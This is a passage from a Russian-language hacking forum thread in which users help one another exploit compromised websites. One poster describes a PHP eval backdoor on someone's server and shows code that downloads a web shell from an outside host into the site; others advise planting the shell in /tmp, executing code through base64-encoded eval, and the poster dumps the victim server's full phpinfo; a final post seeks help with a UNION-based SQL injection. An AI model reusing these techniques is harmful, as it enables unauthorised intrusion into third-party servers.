Старый 04.06.2014, 09:55   #3241
nikp
Banned
 
Регистрация: 05.07.2010
Сообщений: 201
Репутация: 183
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
У конструкций include, echo, print скобки можно добавить, но не опустить.
По смыслу - наверное да.
Но по официальной документации на http://www.php.net
PHP код:
mixed eval ( string $code )
int print ( string $arg )
void echo ( string $arg1 [, string $... ] ) 
и выдержка из http://www.php.net/manual/ru/function.echo.php
Код:
На самом деле echo - это не функция, а конструкция языка, поэтому заключать аргументы в скобки необязательно.
Цитата:
Сообщение от NameSpace Посмотреть сообщение
Как вариант, можно создать алиас функции:
Да, и через переменную тоже можно обратиться, но от скобок это не избавляет.
А было бы интересно не столько для обфускации, сколько для обхода фильтра на скобки.
nikp вне форума   Ответить с цитированием
Старый 04.06.2014, 10:39   #3242
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Григорий Земсков — руководитель компании «Ревизиум», специалист по информационной безопасности. Автор и разработчик сканера вредоносного кода AI-Bolit.
к нему вопросы

зы: в ai-bolit есть читалка, работающая на основе брута и некоторой линейности crc32
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)
HeartLESS вне форума   Ответить с цитированием
Старый 13.06.2014, 23:40   #3243
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Есть бэкдор php
Код:
eval($_POST['sys_call']);
Отправляю пост phpinfo(); все удачно, php 5 версии.
allow_url_fopen On
allow_url_include Off
Раньше шелл заливал так:
Код:
ev=copy($_COOKIE[ev2],$_COOKIE[ev3]);
ev2=http://site.com/shell.txt
ev3=images/image.php
или так
Код:
$linky="http://site.com/123.txt"; 
$saved="/var/www/site/123.php"; 
$from=fopen("$linky","r"); 
$to=fopen("$saved","w"); 
while(!feof($from)){ 
$string=fgets($from,4096); 
fputs($to,$string); 
} 
fclose($to); 
fclose($from);
сейчас же так не получается. Возможно не получается т.к. нет прав на запись, как мне просмотреть все папки и файлы разрешенные на запись?
z0mbie вне форума   Ответить с цитированием
Старый 13.06.2014, 23:53   #3244
Ravenous
 
Регистрация: 14.07.2012
Сообщений: 64
Репутация: 1
По умолчанию

Цитата:
Сообщение от z0mbie Посмотреть сообщение
как мне просмотреть все папки и файлы разрешенные на запись?
покажи вывод system('ls -la');

заливай шелл в /tmp
и делай include('/tmp/shell.php');
увидишь потом запрещенные на запись

Последний раз редактировалось Ravenous; 13.06.2014 в 23:59..
Ravenous вне форума   Ответить с цитированием
Старый 14.06.2014, 00:30   #3245
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Цитата:
Сообщение от Ravenous Посмотреть сообщение
покажи вывод system('ls -la');

заливай шелл в /tmp
и делай include('/tmp/shell.php');
увидишь потом запрещенные на запись
при system('ls -la'); ничего не происходит вывода нет. (Смотрел даже в исходном коде страницы)
Инклуд также не получился. Хотя может даже и не сработала команда инклуд.
z0mbie вне форума   Ответить с цитированием
Старый 14.06.2014, 00:36   #3246
Ravenous
 
Регистрация: 14.07.2012
Сообщений: 64
Репутация: 1
По умолчанию

Цитата:
Сообщение от z0mbie Посмотреть сообщение
при system('ls -la'); ничего не происходит вывода нет. (Смотрел даже в исходном коде страницы)
Инклуд также не получился. Хотя может даже и не сработала команда инклуд.
а mq=off точно? может админ включил их? Бекдор без stripslashes.
Покажи phpinfo
Ravenous вне форума   Ответить с цитированием
Старый 14.06.2014, 01:20   #3247
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Код:
PHP Version 5.3.3

System 	Linux site.com 2.6.32-042stab072.10 #1 SMP Wed Jan 16 18:54:05 MSK 2013 x86_64 
Build Date 	Dec 11 2013 03:27:35 
Configure Command 	 './configure' '--build=x86_64-redhat-linux-gnu' '--host=x86_64-redhat-linux-gnu' '--target=x86_64-redhat-linux-gnu' '--program-prefix=' '--prefix=/usr' '--exec-prefix=/usr' '--bindir=/usr/bin' '--sbindir=/usr/sbin' '--sysconfdir=/etc' '--datadir=/usr/share' '--includedir=/usr/include' '--libdir=/usr/lib64' '--libexecdir=/usr/libexec' '--localstatedir=/var' '--sharedstatedir=/var/lib' '--mandir=/usr/share/man' '--infodir=/usr/share/info' '--cache-file=../config.cache' '--with-libdir=lib64' '--with-config-file-path=/etc' '--with-config-file-scan-dir=/etc/php.d' '--disable-debug' '--with-pic' '--disable-rpath' '--without-pear' '--with-bz2' '--with-exec-dir=/usr/bin' '--with-freetype-dir=/usr' '--with-png-dir=/usr' '--with-xpm-dir=/usr' '--enable-gd-native-ttf' '--without-gdbm' '--with-gettext' '--with-gmp' '--with-iconv' '--with-jpeg-dir=/usr' '--with-openssl' '--with-pcre-regex=/usr' '--with-zlib' '--with-layout=GNU' '--enable-exif' '--enable-ftp' '--enable-magic-quotes' '--enable-sockets' '--enable-sysvsem' '--enable-sysvshm' '--enable-sysvmsg' '--with-kerberos' '--enable-ucd-snmp-hack' '--enable-shmop' '--enable-calendar' '--without-sqlite' '--with-libxml-dir=/usr' '--enable-xml' '--with-system-tzdata' '--enable-force-cgi-redirect' '--enable-pcntl' '--with-imap=shared' '--with-imap-ssl' '--enable-mbstring=shared' '--enable-mbregex' '--with-gd=shared' '--enable-bcmath=shared' '--enable-dba=shared' '--with-db4=/usr' '--with-xmlrpc=shared' '--with-ldap=shared' '--with-ldap-sasl' '--with-mysql=shared,/usr' '--with-mysqli=shared,/usr/lib64/mysql/mysql_config' '--enable-dom=shared' '--with-pgsql=shared' '--enable-wddx=shared' '--with-snmp=shared,/usr' '--enable-soap=shared' '--with-xsl=shared,/usr' '--enable-xmlreader=shared' '--enable-xmlwriter=shared' '--with-curl=shared,/usr' '--enable-fastcgi' '--enable-pdo=shared' '--with-pdo-odbc=shared,unixODBC,/usr' '--with-pdo-mysql=shared,/usr/lib64/mysql/mysql_config' '--with-pdo-pgsql=shared,/usr' '--with-pdo-sqlite=shared,/usr' '--with-sqlite3=shared,/usr' '--enable-json=shared' '--enable-zip=shared' '--without-readline' '--with-libedit' '--with-pspell=shared' '--enable-phar=shared' '--with-tidy=shared,/usr' '--enable-sysvmsg=shared' '--enable-sysvshm=shared' '--enable-sysvsem=shared' '--enable-posix=shared' '--with-unixODBC=shared,/usr' '--enable-fileinfo=shared' '--enable-intl=shared' '--with-icu-dir=/usr' '--with-enchant=shared,/usr' '--with-recode=shared,/usr' 
Server API 	CGI/FastCGI 
Virtual Directory Support 	disabled 
Configuration File (php.ini) Path 	/etc 
Loaded Configuration File 	/var/www/vhosts/site.com/etc/php.ini 
Scan this dir for additional .ini files 	/etc/php.d 
Additional .ini files parsed 	/etc/php.d/00-ioncube-loader.ini, /etc/php.d/curl.ini, /etc/php.d/dom.ini, /etc/php.d/fileinfo.ini, /etc/php.d/gd.ini, /etc/php.d/imap.ini, /etc/php.d/json.ini, /etc/php.d/mbstring.ini, /etc/php.d/mysql.ini, /etc/php.d/mysqli.ini, /etc/php.d/pdo.ini, /etc/php.d/pdo_mysql.ini, /etc/php.d/pdo_sqlite.ini, /etc/php.d/phar.ini, /etc/php.d/sqlite3.ini, /etc/php.d/wddx.ini, /etc/php.d/xmlreader.ini, /etc/php.d/xmlwriter.ini, /etc/php.d/xsl.ini, /etc/php.d/zend_extensions_psa.ini, /etc/php.d/zip.ini 
PHP API 	20090626 
PHP Extension 	20090626 
Zend Extension 	220090626 
Zend Extension Build 	API220090626,NTS 
PHP Extension Build 	API20090626,NTS 
Debug Build 	no 
Thread Safety 	disabled 
Zend Memory Manager 	enabled 
Zend Multibyte Support 	disabled 
IPv6 Support 	enabled 
Registered PHP Streams 	https, ftps, compress.zlib, compress.bzip2, php, file, glob, data, http, ftp, phar, zip 
Registered Stream Socket Transports 	tcp, udp, unix, udg, ssl, sslv3, sslv2, tls 
Registered Stream Filters 	zlib.*, bzip2.*, convert.iconv.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk 

 This program makes use of the Zend Scripting Language Engine:
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with the ionCube PHP Loader v4.0.14, Copyright (c) 2002-2011, by ionCube Ltd.


Configuration
bz2BZip2 Support 	Enabled 
Stream Wrapper support 	compress.bz2:// 
Stream Filter support 	bzip2.decompress, bzip2.compress 
BZip2 Version 	1.0.5, 10-Dec-2007 


calendarCalendar support 	enabled 


cgi-fcgiDirective	Local Value	Master Value
cgi.check_shebang_line	1	1
cgi.discard_path	0	0
cgi.fix_pathinfo	1	1
cgi.force_redirect	1	1
cgi.nph	0	0
cgi.redirect_status_env	no value	no value
cgi.rfc2616_headers	0	0
fastcgi.logging	1	1


CorePHP Version 	5.3.3 

Directive	Local Value	Master Value
allow_call_time_pass_reference	Off	Off
allow_url_fopen	On	On
allow_url_include	Off	Off
always_populate_raw_post_data	Off	Off
arg_separator.input	&	&
arg_separator.output	&	&
asp_tags	Off	Off
auto_append_file	no value	no value
auto_globals_jit	On	On
auto_prepend_file	no value	no value
browscap	no value	no value
default_charset	no value	no value
default_mimetype	text/html	text/html
define_syslog_variables	Off	Off
disable_classes	no value	no value
disable_functions	no value	no value
display_errors	Off	Off
display_startup_errors	Off	Off
doc_root	no value	no value
docref_ext	no value	no value
docref_root	no value	no value
enable_dl	Off	Off
error_append_string	no value	no value
error_log	no value	no value
error_prepend_string	no value	no value
error_reporting	30711	E_ALL & ~E_NOTICE & ~E_DEPRECATED
exit_on_timeout	Off	Off
expose_php	Off	Off
extension_dir	/usr/lib64/php/modules	/usr/lib64/php/modules
file_uploads	On	On
highlight.bg	#FFFFFF	#FFFFFF
highlight.comment	#FF8000	#FF8000
highlight.default	#0000BB	#0000BB
highlight.html	#000000	#000000
highlight.keyword	#007700	#007700
highlight.string	#DD0000	#DD0000
html_errors	Off	Off
ignore_repeated_errors	Off	Off
ignore_repeated_source	Off	Off
ignore_user_abort	Off	Off
implicit_flush	Off	Off
include_path	.:	.:
log_errors	On	On
log_errors_max_len	1024	1024
magic_quotes_gpc	Off	Off
magic_quotes_runtime	Off	Off
magic_quotes_sybase	Off	Off
mail.add_x_header	On	On
mail.force_extra_parameters	no value	no value
mail.log	no value	no value
max_execution_time	1200	1200
max_file_uploads	20	20
max_input_nesting_level	64	64
max_input_time	1200	1200
max_input_vars	10000	10000
memory_limit	1024M	1024M
open_basedir	/var/www/vhosts/site.com/:/tmp/	/var/www/vhosts/site.com/:/tmp/
output_buffering	4096	4096
output_handler	no value	no value
post_max_size	128M	128M
precision	14	14
realpath_cache_size	16K	16K
realpath_cache_ttl	120	120
register_argc_argv	Off	Off
register_globals	Off	Off
register_long_arrays	Off	Off
report_memleaks	On	On
report_zend_debug	On	On
request_order	GP	GP
safe_mode	Off	Off
safe_mode_exec_dir	no value	no value
safe_mode_gid	Off	Off
safe_mode_include_dir	no value	no value
sendmail_from	no value	no value
sendmail_path	/usr/sbin/sendmail -t -i	/usr/sbin/sendmail -t -i
serialize_precision	100	100
short_open_tag	On	On
SMTP	localhost	localhost
smtp_port	25	25
sql.safe_mode	Off	Off
track_errors	Off	Off
unserialize_callback_func	no value	no value
upload_max_filesize	128M	128M
upload_tmp_dir	no value	no value
user_dir	no value	no value
user_ini.cache_ttl	300	300
user_ini.filename	.user.ini	.user.ini
variables_order	GPCS	GPCS
xmlrpc_error_number	0	0
xmlrpc_errors	Off	Off
y2k_compliance	On	On
zend.enable_gc	On	On


ctypectype functions 	enabled 


curlcURL support 	enabled 
cURL Information 	7.19.7 
Age 	3 
Features 
AsynchDNS 	No 
Debug 	No 
GSS-Negotiate 	Yes 
IDN 	Yes 
IPv6 	Yes 
Largefile 	Yes 
NTLM 	Yes 
SPNEGO 	No 
SSL 	Yes 
SSPI 	No 
krb4 	No 
libz 	Yes 
CharConv 	No 
Protocols 	tftp, ftp, telnet, dict, ldap, ldaps, http, file, https, ftps, scp, sftp 
Host 	x86_64-redhat-linux-gnu 
SSL Version 	NSS/3.13.1.0 
ZLib Version 	1.2.3 
libSSH Version 	libssh2/1.2.2 


datedate/time support 	enabled 
"Olson" Timezone Database Version 	0.system 
Timezone Database 	internal 
Default timezone 	Asia/Singapore 

Directive	Local Value	Master Value
date.default_latitude	31.7667	31.7667
date.default_longitude	35.2333	35.2333
date.sunrise_zenith	90.583333	90.583333
date.sunset_zenith	90.583333	90.583333
date.timezone	Asia/Singapore	Asia/Singapore


domDOM/XML 	enabled 
DOM/XML API Version 	20031129 
libxml Version 	2.7.6 
HTML Support 	enabled 
XPath Support 	enabled 
XPointer Support 	enabled 
Schema Support 	enabled 
RelaxNG Support 	enabled 


eregRegex Library 	Bundled library enabled 


exifEXIF Support 	enabled 
EXIF Version 	1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $ 
Supported EXIF Version 	0220 
Supported filetypes 	JPEG,TIFF 

Directive	Local Value	Master Value
exif.decode_jis_intel	JIS	JIS
exif.decode_jis_motorola	JIS	JIS
exif.decode_unicode_intel	UCS-2LE	UCS-2LE
exif.decode_unicode_motorola	UCS-2BE	UCS-2BE
exif.encode_jis	no value	no value
exif.encode_unicode	ISO-8859-15	ISO-8859-15


fileinfofileinfo support	enabled
version 	1.0.5-dev 


filterInput Validation and Filtering 	enabled 
Revision 	$Revision: 298196 $ 

Directive	Local Value	Master Value
filter.default	unsafe_raw	unsafe_raw
filter.default_flags	no value	no value


ftpFTP support 	enabled 


gdGD Support 	enabled 
GD Version 	bundled (2.0.34 compatible) 
FreeType Support 	enabled 
FreeType Linkage 	with freetype 
FreeType Version 	2.3.11 
GIF Read Support 	enabled 
GIF Create Support 	enabled 
JPEG Support 	enabled 
libJPEG Version 	6b 
PNG Support 	enabled 
libPNG Version 	1.2.49 
WBMP Support 	enabled 
XPM Support 	enabled 
XBM Support 	enabled 

Directive	Local Value	Master Value
gd.jpeg_ignore_warning	0	0


gettextGetText Support 	enabled 


gmpgmp support 	enabled 
GMP version 	4.3.1 


hashhash support 	enabled 
Hashing Engines 	md2 md4 md5 sha1 sha224 sha256 sha384 sha512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost adler32 crc32 crc32b salsa10 salsa20 haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5 


iconviconv support 	enabled 
iconv implementation 	glibc 
iconv library version 	2.12 

Directive	Local Value	Master Value
iconv.input_encoding	ISO-8859-1	ISO-8859-1
iconv.internal_encoding	ISO-8859-1	ISO-8859-1
iconv.output_encoding	ISO-8859-1	ISO-8859-1


imapIMAP c-Client Version 	2007e 
SSL Support 	enabled 
Kerberos Support 	enabled 


jsonjson support 	enabled 
json version 	1.2.1 


libxmllibXML support 	active 
libXML Compiled Version 	2.7.6 
libXML Loaded Version 	20706 
libXML streams 	enabled 


mbstringMultibyte Support 	enabled 
Multibyte string engine 	libmbfl 
HTTP input encoding translation 	disabled 

mbstring extension makes use of "streamable kanji code filter and converter", which is distributed under the GNU Lesser General Public License version 2.1.

Multibyte (japanese) regex support 	enabled 
Multibyte regex (oniguruma) backtrack check 	On 
Multibyte regex (oniguruma) version 	4.7.1 

Directive	Local Value	Master Value
mbstring.detect_order	no value	no value
mbstring.encoding_translation	Off	Off
mbstring.func_overload	0	0
mbstring.http_input	pass	pass
mbstring.http_output	pass	pass
mbstring.http_output_conv_mimetypes	^(text/|application/xhtml\+xml)	^(text/|application/xhtml\+xml)
mbstring.internal_encoding	no value	no value
mbstring.language	neutral	neutral
mbstring.strict_detection	Off	Off
mbstring.substitute_character	no value	no value


mysqlMySQL Support	enabled
Active Persistent Links 	0 
Active Links 	1 
Client API version 	5.1.73 
MYSQL_MODULE_TYPE 	external 
MYSQL_SOCKET 	/var/lib/mysql/mysql.sock 
MYSQL_INCLUDE 	-I/usr/include/mysql 
MYSQL_LIBS 	-L/usr/lib64/mysql -lmysqlclient 

Directive	Local Value	Master Value
mysql.allow_local_infile	On	On
mysql.allow_persistent	On	On
mysql.connect_timeout	60	60
mysql.default_host	no value	no value
mysql.default_password	no value	no value
mysql.default_port	no value	no value
mysql.default_socket	/var/lib/mysql/mysql.sock	/var/lib/mysql/mysql.sock
mysql.default_user	no value	no value
mysql.max_links	Unlimited	Unlimited
mysql.max_persistent	Unlimited	Unlimited
mysql.trace_mode	Off	Off


mysqliMysqlI Support	enabled
Client API library version 	5.1.73 
Active Persistent Links 	0 
Inactive Persistent Links 	0 
Active Links 	0 
Client API header version 	5.1.71 
MYSQLI_SOCKET 	/var/lib/mysql/mysql.sock 

Directive	Local Value	Master Value
mysqli.allow_local_infile	On	On
mysqli.allow_persistent	On	On
mysqli.default_host	no value	no value
mysqli.default_port	3306	3306
mysqli.default_pw	no value	no value
mysqli.default_socket	no value	no value
mysqli.default_user	no value	no value
mysqli.max_links	Unlimited	Unlimited
mysqli.max_persistent	Unlimited	Unlimited
mysqli.reconnect	Off	Off


opensslOpenSSL support 	enabled 
OpenSSL Library Version 	OpenSSL 1.0.1e-fips 11 Feb 2013 
OpenSSL Header Version 	OpenSSL 1.0.1e-fips 11 Feb 2013 


pcntlpcntl support	enabled


pcrePCRE (Perl Compatible Regular Expressions) Support 	enabled 
PCRE Library Version 	7.8 2008-09-05 

Directive	Local Value	Master Value
pcre.backtrack_limit	100000	100000
pcre.recursion_limit	100000	100000


PDOPDO support	enabled
PDO drivers 	mysql, sqlite 


pdo_mysqlPDO Driver for MySQL	enabled
Client API version 	5.1.73 


pdo_sqlitePDO Driver for SQLite 3.x	enabled
SQLite Library 	3.6.20 


PharPhar: PHP Archive support	enabled
Phar EXT version 	2.0.1 
Phar API version 	1.1.1 
SVN revision 	$Revision: 298908 $ 
Phar-based phar archives 	enabled 
Tar-based phar archives 	enabled 
ZIP-based phar archives 	enabled 
gzip compression 	enabled 
bzip2 compression 	enabled 
Native OpenSSL support 	enabled 

 Phar based on pear/PHP_Archive, original concept by Davey Shafik.
Phar fully realized by Gregory Beaver and Marcus Boerger.
Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle.

Directive	Local Value	Master Value
phar.cache_list	no value	no value
phar.readonly	On	On
phar.require_hash	On	On


ReflectionReflection	enabled
Version 	$Revision: 300393 $ 


sessionSession Support 	enabled 
Registered save handlers 	files user 
Registered serializer handlers 	php php_binary wddx 

Directive	Local Value	Master Value
session.auto_start	Off	Off
session.bug_compat_42	Off	Off
session.bug_compat_warn	Off	Off
session.cache_expire	180	180
session.cache_limiter	nocache	nocache
session.cookie_domain	.site.com	no value
session.cookie_httponly	Off	Off
session.cookie_lifetime	0	0
session.cookie_path	/	/
session.cookie_secure	Off	Off
session.entropy_file	no value	no value
session.entropy_length	0	0
session.gc_divisor	1000	1000
session.gc_maxlifetime	1440	1440
session.gc_probability	100	1
session.hash_bits_per_character	5	5
session.hash_function	0	0
session.name	XTCsid	PHPSESSID
session.referer_check	no value	no value
session.save_handler	user	files
session.save_path	/var/lib/php/session	/var/lib/php/session
session.serialize_handler	php	php
session.use_cookies	On	On
session.use_only_cookies	On	On
session.use_trans_sid	0	0


shmopshmop support 	enabled 


SimpleXMLSimplexml support	enabled
Revision 	$Revision: 299424 $ 
Schema support 	enabled 


socketsSockets Support 	enabled 


SPLSPL support	enabled
Interfaces 	Countable, OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubject 
Classes 	AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueException 


sqlite3SQLite3 support	enabled
SQLite3 module version 	0.7-dev 
SQLite Library 	3.6.20 

Directive	Local Value	Master Value
sqlite3.extension_dir	no value	no value


standardDynamic Library Support 	enabled 
Path to sendmail 	/usr/sbin/sendmail -t -i 

Directive	Local Value	Master Value
assert.active	1	1
assert.bail	0	0
assert.callback	no value	no value
assert.quiet_eval	0	0
assert.warning	1	1
auto_detect_line_endings	0	0
default_socket_timeout	60	60
safe_mode_allowed_env_vars	PHP_	PHP_
safe_mode_protected_env_vars	LD_LIBRARY_PATH	LD_LIBRARY_PATH
url_rewriter.tags	a=href,area=href,frame=src,input=src,form=fakeentry	a=href,area=href,frame=src,input=src,form=fakeentry
user_agent	no value	no value


tokenizerTokenizer Support 	enabled 


wddxWDDX Support	enabled
WDDX Session Serializer 	enabled 


xmlXML Support 	active 
XML Namespace Support 	active 
libxml2 Version 	2.7.6 


xmlreaderXMLReader 	enabled 


xmlwriterXMLWriter 	enabled 


xslXSL 	enabled 
libxslt Version 	1.1.26 
libxslt compiled against libxml Version 	2.7.6 
EXSLT 	enabled 
libexslt Version 	1.1.26 


zipZip 	enabled 
Extension Version 	$Id: php_zip.c 300470 2010-06-15 18:48:33Z pajoye $ 
Zip version 	1.9.1 
Libzip version 	0.9.0 


zlibZLib Support 	enabled 
Stream Wrapper support 	compress.zlib:// 
Stream Filter support 	zlib.inflate, zlib.deflate 
Compiled Version 	1.2.3 
Linked Version 	1.2.3 

Directive	Local Value	Master Value
zlib.output_compression	Off	Off
zlib.output_compression_level	-1	-1
zlib.output_handler	no value	no value


Additional ModulesModule Name
ionCube Loader
readline


EnvironmentVariable	Value
PATH 	/usr/local/bin:/usr/bin:/bin 
REDIRECT_STATUS 	200 
PP_CUSTOM_PHP_INI 	/var/www/vhosts/site.com/etc/php.ini 
HTTP_HOST 	www.site.com 
HTTP_X_REAL_IP 	 
HTTP_X_FORWARDED_FOR 	 
HTTP_X_ACCEL_INTERNAL 	/internal-nginx-static-location 
HTTP_CONNECTION 	close 
CONTENT_LENGTH 	25 
HTTP_USER_AGENT 	Opera/9.80 (Windows NT 6.2; WOW64) Presto/2.12.388 Version/12.15 
CONTENT_TYPE 	application/x-www-form-urlencoded 
SERVER_SOFTWARE 	Apache 
SERVER_NAME 	www.site.com 
SERVER_ADDR 	 
SERVER_PORT 	80 
REMOTE_ADDR 	 
DOCUMENT_ROOT 	/var/www/vhosts/site.com/httpdocs 
SERVER_ADMIN 	info@site.com 
SCRIPT_FILENAME 	/var/www/vhosts/site.com/httpdocs/login.php 
REMOTE_PORT 	55285 
REDIRECT_URL 	/login.php 
GATEWAY_INTERFACE 	CGI/1.1 
SERVER_PROTOCOL 	HTTP/1.0 
REQUEST_METHOD 	POST 
QUERY_STRING 	no value 
REQUEST_URI 	/login.php 
SCRIPT_NAME 	/login.php 
ORIG_SCRIPT_FILENAME 	/var/www/cgi-bin/cgi_wrapper/cgi_wrapper 
ORIG_PATH_INFO 	/login.php 
ORIG_PATH_TRANSLATED 	/var/www/vhosts/site.com/httpdocs/login.php 
ORIG_SCRIPT_NAME 	/phppath/cgi_wrapper 


PHP VariablesVariable	Value
PHP_SELF 	/login.php 
_SERVER["PATH"]	/usr/local/bin:/usr/bin:/bin
_SERVER["REDIRECT_STATUS"]	200
_SERVER["PP_CUSTOM_PHP_INI"]	/var/www/vhosts/site.com/etc/php.ini
_SERVER["HTTP_HOST"]	www.site.com
_SERVER["HTTP_X_REAL_IP"]	
_SERVER["HTTP_X_FORWARDED_FOR"]	
_SERVER["HTTP_X_ACCEL_INTERNAL"]	/internal-nginx-static-location
_SERVER["HTTP_CONNECTION"]	close
_SERVER["CONTENT_LENGTH"]	25
_SERVER["HTTP_USER_AGENT"]	Opera/9.80 (Windows NT 6.2; WOW64) Presto/2.12.388 Version/12.15
_SERVER["HTTP_ACCEPT"]	text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
_SERVER["HTTP_ACCEPT_LANGUAGE"]	ru-RU,ru;q=0.9,en;q=0.8
_SERVER["HTTP_ACCEPT_ENCODING"]	gzip, deflate
_SERVER["CONTENT_TYPE"]	application/x-www-form-urlencoded
_SERVER["SERVER_SOFTWARE"]	Apache
_SERVER["SERVER_NAME"]	www.site.com
_SERVER["SERVER_ADDR"]	
_SERVER["SERVER_PORT"]	80
_SERVER["REMOTE_ADDR"]	
_SERVER["DOCUMENT_ROOT"]	/var/www/vhosts/site.com/httpdocs
_SERVER["SERVER_ADMIN"]	info@site.com
_SERVER["SCRIPT_FILENAME"]	/var/www/vhosts/site.com/httpdocs/login.php
_SERVER["REMOTE_PORT"]	55285
_SERVER["REDIRECT_URL"]	/login.php
_SERVER["GATEWAY_INTERFACE"]	CGI/1.1
_SERVER["SERVER_PROTOCOL"]	HTTP/1.0
_SERVER["REQUEST_METHOD"]	POST
_SERVER["QUERY_STRING"]	no value
_SERVER["REQUEST_URI"]	/login.php
_SERVER["SCRIPT_NAME"]	/login.php
_SERVER["ORIG_SCRIPT_FILENAME"]	/var/www/cgi-bin/cgi_wrapper/cgi_wrapper
_SERVER["ORIG_PATH_INFO"]	/login.php
_SERVER["ORIG_PATH_TRANSLATED"]	/var/www/vhosts/site.com/httpdocs/login.php
_SERVER["ORIG_SCRIPT_NAME"]	/phppath/cgi_wrapper
_SERVER["PHP_SELF"]	/login.php
_SERVER["REQUEST_TIME"]	1402694527
_ENV["HTTP_USER_AGENT"]	Opera/9.80 (Windows NT 6.2; WOW64) Presto/2.12.388 Version/12.15
_ENV["REMOTE_ADDR"]	
_ENV["REQUEST_URI"]	/login.php
phpinfo
z0mbie вне форума   Ответить с цитированием
Старый 14.06.2014, 07:51   #3248
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от z0mbie Посмотреть сообщение
Возможно не получается т.к. нет прав на запись, как мне просмотреть все папки и файлы разрешенные на запись?
Загрузите файл методом multipart/form-data и посмотрите var_dump($_FILES). Там будет директория, в которую точно разрешена запись. С помощью move_uploaded_file переместите файл в нужный каталог (или оставьте здесь, но смените имя и выполняйте его), учитывайте open_basedir.

Возможный способ исполнения кода:
PHP код:
eval(base64_decode(cGhwaW5mbygpOyAg)); 

Последний раз редактировалось NameSpace; 14.06.2014 в 07:57..
NameSpace вне форума   Ответить с цитированием
Старый 14.06.2014, 23:08   #3249
z0mbie
 
Регистрация: 05.08.2010
Сообщений: 68
Репутация: 0
По умолчанию

Цитата:
Сообщение от NameSpace Посмотреть сообщение
Возможный способ исполнения кода:
PHP код:
eval(base64_decode(cGhwaW5mbygpOyAg)); 
Благодарю, помогло.
z0mbie вне форума   Ответить с цитированием
Старый 16.06.2014, 15:20   #3250
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

бд postgresql. между бд и самим сайтом есть какой-то скрипт, который кидает ответы от базы в json`e (если запрос некорректный, кидает 500 ошибку)
запрос
Цитата:
' OR 1=1--
нормально проходит, выводит все. затем подбираю
Цитата:
' ORDER BY 14--
ОК, 14. теперь, когда хочу посмотреть вывод
Цитата:
' UNION SELECT null,null,null,null,null,null,null,null,null,null, null,null,null,null--
в консоль падает 500 ошибка. а запрос
Цитата:
';SELECT null,null,null,null,null,null,null,null,null,null, null,null,null,null
вовсе ничего не выводит, и ни на что не ругается.
где я ошибся?
faza02 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot